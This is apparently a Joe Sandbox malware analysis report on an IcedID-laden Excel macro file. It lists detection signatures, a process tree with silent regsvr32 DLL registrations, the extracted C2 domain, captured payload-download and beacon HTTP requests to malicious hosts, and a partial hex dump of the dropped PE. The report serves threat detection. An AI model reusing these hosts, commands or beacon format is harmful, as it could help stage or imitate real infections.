Play interactive tour

Edit tour

Windows Analysis Report PI-9823472110866.xlsm

Overview

General Information

Sample Name:	PI-9823472110866.xlsm
Analysis ID:	444737
MD5:	8b631bad0869713bdfb6ba803d971283
SHA1:	74e21a99c75d20c0bd76db5d1a77c39b1721dfc7
SHA256:	8df7d1c0c37a519963e31bd2c7fd34b1cb5de232ee3bd9b1ab89878054d08715
Tags:	IcedIDxlsm
Infos:
Most interesting Screenshot:

Detection

IcedID

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected IcedID

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect virtualization through RDTSC time measurements

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query network adapater information

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Excel documents contains an embedded macro which executes code when the document is opened

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains an invalid checksum

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2640 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

regsvr32.exe (PID: 2460 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2656 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2376 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2091667862.00000000000B0000.00000004.00000001.sdmp	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30b4:$string0: _gat= 0x3114:$string1: _ga= 0x30ec:$string2: _gid= 0x30cc:$string3: _u= 0x3026:$string4: _io= 0x30d8:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3080:$string9: POST 0x3140:$string10: aws.amazon.com
00000004.00000002.2091763372.000000000020D000.00000004.00000020.sdmp	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security
Process Memory Space: regsvr32.exe PID: 2656	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.regsvr32.exe.b0000.0.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x1bc6:$internal_name: loader_dll_64.dll 0x1f16:$string6: WINHTTP.dll 0x1bea:$string7: DllRegisterServer 0x1bfc:$string8: PluginInit
4.2.regsvr32.exe.3f0000.1.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30bc:$string0: _gat= 0x311c:$string1: _ga= 0x30f4:$string2: _gid= 0x30d4:$string3: _u= 0x302e:$string4: _io= 0x30e0:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3088:$string9: POST 0x3148:$string10: aws.amazon.com
4.2.regsvr32.exe.b0000.0.raw.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30b4:$string0: _gat= 0x3114:$string1: _ga= 0x30ec:$string2: _gid= 0x30cc:$string3: _u= 0x3026:$string4: _io= 0x30d8:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3080:$string9: POST 0x3140:$string10: aws.amazon.com

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2640, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2460

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.regsvr32.exe.3f0000.1.unpack

Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2091763372.000000000020D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2656, type: MEMORY

Source: unknown

HTTPS traffic detected: 143.204.91.74:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: lsdfik[1].fml.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Source: global traffic

DNS query: name: thousandsyears.download

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 143.204.91.74:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.198.51:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: astrocycle.download

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 14:14:28 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 1076Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=GJmmU9sqa2u7Vr22UhNQ37pnXPXaZjQU%2FySRSipuqp7OkgZ0DAGaJ3STsqtkjsrCbkCHYlP%2BdkgBSNs7LdSIavPpAmT5Ze1Gyn32ivAYh8f6UUUKilFOpdKkgg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9708e89174dc4-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5329:48; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=303838373533:416C627573:46383039434146363335303344423245; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download

Source: Joe Sandbox View	IP Address: 172.67.198.51 172.67.198.51
Source: Joe Sandbox View	IP Address: 143.204.91.74 143.204.91.74
Source: Joe Sandbox View	IP Address: 172.67.213.115 172.67.213.115

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 143.204.91.74:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F30D540C.png

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:5329:48; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=303838373533:416C627573:46383039434146363335303344423245; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download

Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: ; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://*.ytimg equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: X-Amz-Cf-IdEYLuwm_yYv_qWxI-5oSKx5f8PajWObpfX1s5-bihD19QAV_pMS9yTw==X-Amz-Cf-PopFRA50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: X-Amz-Cf-IdEYLuwm_yYv_qWxI-5oSKx5f8PajWObpfX1s5-bihD19QAV_pMS9yTw==X-Amz-Cf-PopFRA50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
Source: regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	String found in binary or memory: d; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://*.ytimg equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
Source: regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	String found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
Source: regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: thousandsyears.download

Source: global traffic

